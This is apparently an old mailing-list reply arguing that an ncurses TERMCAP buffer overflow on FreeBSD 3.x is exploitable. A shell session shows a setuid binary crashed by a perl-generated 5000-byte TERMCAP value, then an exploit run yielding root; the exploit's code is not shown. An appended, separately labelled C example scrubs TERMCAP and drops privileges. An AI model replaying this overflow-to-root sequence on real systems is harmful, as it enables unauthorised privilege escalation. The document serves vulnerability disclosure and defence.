> Furthermore, it is not actually a vulnerability. It seems that setuid
> programs will not accept an alternate termcap file via TERMCAP even under
> the old version of ncurses in FreeBSD 3.x. Therefore this "exploit" can
> only be used on your own binaries.

Sure?

lubi:venglin:~> uname -a
FreeBSD lubi.freebsd.lublin.pl 3.4-STABLE FreeBSD 3.4-STABLE #1: Wed Mar  1
11:18:54 CET 2000
[EMAIL PROTECTED]:/mnt/elite/usr/src/sys/compile/GADACZKA  i386
lubi:venglin:~> cat dupa.c
main() { initscr(); }
lubi:venglin:~> cc -o d dupa.c -lncurses
lubi:venglin:~> su
s/key 76 ve15188
Password:
lubi:venglin:/home/venglin# chmod 4755 d ; chown root.wheel d
lubi:venglin:/home/venglin# exit
lubi:venglin:~> ./d
lubi:venglin:~> setenv TERMCAP `perl -e 'print "A"x5000'`
lubi:venglin:~> ./d
Segmentation fault
lubi:venglin:~> ./dupaexp 4000
ret: 0xbfbfba8c
# id
uid=0(root) gid=1001(users) groups=1001(users), 0(wheel)

Obviously, *most* binaries are dropping root privileges before using any ncurses
functions.

--
* Fido: 2:480/124 ** WWW: http://www.freebsd.lublin.pl ** NIC-HDL: PMF9-RIPE *
* Inet: [EMAIL PROTECTED] ** PGP: D48684904685DF43  EA93AFA13BE170BF *
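As an added example (not code from the post, nor FreeBSD's or ncurses' own), the two defensive steps a set-uid-root program should take before its first ncurses call: discard a TERMCAP value that is oversized or supplied across a privilege boundary, and permanently drop privileges, which is what the author notes most binaries already do. The helper make_oversized_termcap() and the 1024-byte bound are assumptions.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>

/* Assumed bound: the historic tgetent() buffer is 1024 bytes, so a
 * legitimate TERMCAP entry never needs more than that. */
#define TERMCAP_MAX 1024

/* Hypothetical helper: a 5000-byte TERMCAP value like the one in the post
 * (constructed test input, not a real termcap entry). */
const char *make_oversized_termcap(void) {
    static char buf[5001];
    memset(buf, 'A', 5000);
    buf[5000] = '\0';
    return buf;
}

/* Returns 1 if a TERMCAP value is larger than any sane termcap entry. */
int termcap_is_suspect(const char *val) {
    return val != NULL && strlen(val) > TERMCAP_MAX;
}

/* Remove the externally supplied termcap override when it is oversized or
 * when we run with privileges we did not get from the caller (set-uid).
 * Returns the number of variables removed. Call this before initscr(). */
int scrub_curses_env(void) {
    int removed = 0;
    const char *tc = getenv("TERMCAP");
    if (tc != NULL && (termcap_is_suspect(tc) || getuid() != geteuid())) {
        unsetenv("TERMCAP");
        removed++;
    }
    return removed;
}

/* Give up set-uid/set-gid privileges: group first, then user. For a
 * set-uid-root program setuid() resets real, effective and saved ids, so
 * the drop is permanent. Returns 0 on success, -1 on failure. */
int drop_privileges(void) {
    if (setgid(getgid()) != 0) return -1;
    if (setuid(getuid()) != 0) return -1;
    return (getuid() == geteuid() && getgid() == getegid()) ? 0 : -1;
}

int main(void) {
    setenv("TERMCAP", make_oversized_termcap(), 1);   /* constructed input */
    printf("scrubbed %d env var(s)\n", scrub_curses_env());
    printf("drop_privileges: %s\n", drop_privileges() == 0 ? "ok" : "FAILED");
    /* Only at this point would a set-uid tool call initscr(). */
    return 0;
}
```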
